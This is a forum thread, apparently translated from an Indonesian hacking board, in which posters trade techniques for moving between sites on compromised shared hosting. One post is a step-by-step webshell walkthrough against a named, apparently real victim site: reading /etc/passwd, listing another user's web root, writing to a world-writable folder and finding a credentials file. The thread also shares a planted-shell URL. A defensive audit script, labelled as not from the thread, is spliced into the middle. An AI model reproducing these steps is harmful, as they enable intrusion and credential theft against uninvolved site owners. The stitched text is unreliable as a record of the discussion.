Jumping on a Windows server

Posted: Thu Aug 05, 2010 11:57 am
by anharku
Hmm.. some info here, I'll share it in case someone doesn't yet know about jumping on a Windows server :circle:
From what I've learned, if you get a Windows server and its root directory has something named domains or wwwroot, something like that, there are usually lots of domains listed that can be jumped to... but it also depends on luck with access rights, hehehe,,,, :devil
Once you've got something like that, what are you going to do with it, hmm???? Up to you what you do with it, you bear your own sins :devil

Regards,
anharku

Re: Jumping on a Windows server

Posted: Thu Aug 05, 2010 1:26 pm
by abit doang
hihi,..
on Windows it really is nicer to look around the files or dirs..
look through all the drives & dirs, who knows, there might be some cute files,.. :P

Re: Jumping on a Windows server

Posted: Thu Aug 05, 2010 9:42 pm
by Xshadow
Windows or Linux, doesn't matter... the easiest thing is to read its httpd.conf first

Re: Jumping on a Windows server

Posted: Fri Aug 06, 2010 10:10 am
by anharku
Xshadow wrote:Windows or Linux, doesn't matter... the easiest thing is to read its httpd.conf first
hmm... thanks, bro, for the input :kaca:

Re: Jumping on a Windows server

Posted: Sat Aug 07, 2010 4:25 pm
by 3xtr3m3b0y
Even easier, just go UP..UP..UP, that's all, bro

Re: Jumping on a Windows server

Posted: Sat Aug 07, 2010 5:50 pm
by abit doang
what about a shell like mine..??
looks like it's completely stuck ...
permission 755, no important files either,..
can't go UP either,..
or can it still be shaken loose.???

Code:

http://mau-tau-aja.lu/apaajaboleh/INF0.php
nb : the file was uploaded via FTP, found on its sister site..
nb2 : shell (link) location, hidden by me,..
nb3 : if you want to know the location, please PM me..
:tapa: :maaf: :devil :malumalu: :circle:

Re: Jumping on a Windows server

Posted: Sun Aug 08, 2010 8:33 am
by 3xtr3m3b0y
abit doang wrote:what about a shell like mine..??
looks like it's completely stuck ...
permission 755, no important files either,..
can't go UP either,..
or can it still be shaken loose.???
It's still very much possible, bro:
What we have to work with right now:
Webshell: c99
Web directory path: /home/<user>/public_html

From the two assets above we can look for writable locations as well as database login info; here are the steps I can take:

1. Look at the contents of /etc/passwd
type this in the Command Execution section:
cat /etc/passwd
Next, the list of users on the system will be displayed.

My target this time is the user named hartmann

2. From the user info we've obtained, we can try to get into each user's web directory location.

ls -l /home/hartmann/public_html

Result:

Code:

total 2072
-rw-r--r-- 1 hartmann hartmann    8327 Nov 21  2009 AC_RunActiveContent.js
drwxr-xr-x 2 hartmann hartmann    4096 Sep 25  2009 admin
drwxr-xr-x 2 hartmann hartmann    4096 Sep 10  2009 cgi-bin
-rw-r--r-- 1 hartmann hartmann   12763 Nov 23  2009 contactus.htm
drwxr-xr-x 3 hartmann hartmann    4096 Sep 24  2009 css
-rw-r--r-- 1 hartmann hartmann    7760 Sep 24  2009 gallery.htm
drwxrwxrwx 2 hartmann hartmann    4096 Mar  7 18:06 galleryimages
-rw-r--r-- 1 hartmann hartmann    9319 Nov 21  2009 gallery.php
-rw-r--r-- 1 hartmann hartmann   43815 Nov 21  2009 hartwhite.swf
-rw-r--r-- 1 hartmann hartmann   24155 Nov 23  2009 home.htm
drwxr-xr-x 3 hartmann hartmann    4096 Nov 21  2009 images
drwxr-xr-x 2 hartmann hartmann    4096 Sep 24  2009 include
-rw-r--r-- 1 hartmann hartmann    4470 Oct 27  2009 meetthestaff.htm
drwxr-xr-x 4 hartmann hartmann    4096 Sep 15  2009 _mm
drwxr-xr-x 2 hartmann hartmann    4096 Nov 23  2009 _notes
-rw-r--r-- 1 hartmann hartmann     132 Sep 15  2009 robots.txt
-rw-r--r-- 1 hartmann hartmann    6629 Nov 23  2009 services.htm
-rw-r--r-- 1 hartmann hartmann    8949 Nov 21  2009 Southcoast.htm
-rw-r--r-- 1 hartmann hartmann 1931680 Oct 23  2009 swflash.cab

3. Finding writable locations:
From the list of files and dirs shown above, there is 1 location we can write to, namely:

drwxrwxrwx 2 hartmann hartmann 4096 Mar 7 18:06 galleryimages

We can go straight to that location, then upload or create our own file.
Result:
http://hartmannplumbing.com.au/galleryi ... 3m3b0y.txt

4. Another thing we can do is look for database connection info.
My eye was drawn to the directory:
drwxr-xr-x 2 hartmann hartmann 4096 Sep 24 2009 include

I then went into that location and found some interesting files:

Code:

total 172
-rw-r--r-- 1 hartmann hartmann   1870 Sep 24  2009 dbfunctions.inc
-rw-r--r-- 1 hartmann hartmann   4968 Sep 24  2009 functions.inc
-rw-r--r-- 1 hartmann hartmann   4014 Sep 15  2009 gallery.css
-rw-r--r-- 1 hartmann hartmann  11630 Sep 15  2009 gallery.js
-rw-r--r-- 1 hartmann hartmann 120620 Sep 15  2009 jquery.js
-rw-r--r-- 1 hartmann hartmann    106 Sep 24  2009 logins.inc
-rw-r--r-- 1 hartmann hartmann   4021 Sep 15  2009 thickbox.css
-rw-r--r-- 1 hartmann hartmann  11629 Sep 15  2009 thickbox.js

Next I tried opening the contents of the file logins.inc
Result:
Go check it yourself ahh... :P

Ok, that's all folks
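
Seen from the hosting administrator's side, the walkthrough above depends on three permission conditions: home directories other accounts can traverse, a world-writable directory under public_html (galleryimages), and a world-readable include file (logins.inc). The audit script below is an added example, not part of the original post; the function names, the file-name patterns and the constructed accounts "alice" and "bob" are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): audit a shared-hosting base directory
# for the permission weaknesses the post depends on.

# Print one finding per line for every account under base ($1) with a public_html.
audit_webroots() {
    base="$1"
    for home in "$base"/*/; do
        home="${home%/}"
        [ -d "$home/public_html" ] || continue
        # Home directory other local users can traverse (o+x), e.g. mode 755.
        if [ -n "$(find "$home" -maxdepth 0 -perm -0001)" ]; then
            echo "TRAVERSABLE_HOME $home"
        fi
        # Directories any local user can write to (drwxrwxrwx, like galleryimages).
        find "$home/public_html" -type d -perm -0002 | sort |
            sed 's/^/WORLD_WRITABLE_DIR /'
        # Include/config files readable by everyone (-rw-r--r--, like logins.inc).
        # The name patterns are an assumption; adjust them to the hosted applications.
        find "$home/public_html" -type f \( -name '*.inc' -o -name '*config*.php' \) \
            -perm -0004 | sort | sed 's/^/WORLD_READABLE_SECRET /'
    done
}

# Constructed sample tree: hypothetical accounts "alice" (weak) and "bob" (tight).
make_demo_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/alice/public_html/galleryimages" "$t/alice/public_html/include" \
             "$t/bob/public_html/include"
    echo 'constructed placeholder' > "$t/alice/public_html/include/logins.inc"
    echo 'constructed placeholder' > "$t/bob/public_html/include/logins.inc"
    chmod -R u=rwX,go=rX "$t/alice"                  # 755 dirs, 644 files
    chmod 777 "$t/alice/public_html/galleryimages"   # the world-writable upload dir
    chmod -R u=rwX,g=rX,o= "$t/bob"                  # 750 dirs, 640 files
    echo "$t"
}

# Demo: three findings for alice, none for bob.
demo=$(make_demo_tree)
audit_webroots "$demo"
rm -rf "$demo"
```

Each finding is closed by removing the "other" permission bit it names (o+x on the home directory, o+w on the upload directory, o+r on the credential file). Whether a 750 home directory still serves pages depends on which user and group the web server runs as for that account.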

Re: Jumping on a Windows server

Posted: Sun Aug 08, 2010 12:25 pm
by anharku
thanks bro 3xtr3m3b0y for the technique..
there, now you've been taught :circle:
try various ways.. if you're really stuck, well, go find another target :devil

Re: Jumping on a Windows server

Posted: Sun Aug 08, 2010 7:12 pm
by abit doang
@ bro 3xtr3m3b0y
thanks bro, more new knowledge for me,..
so the point is, even though we can't change dir -> $cd
there's still a chance to $ls | $cat | etc..
awesome.....
:kaca: :tapa: :licik: :malumalu: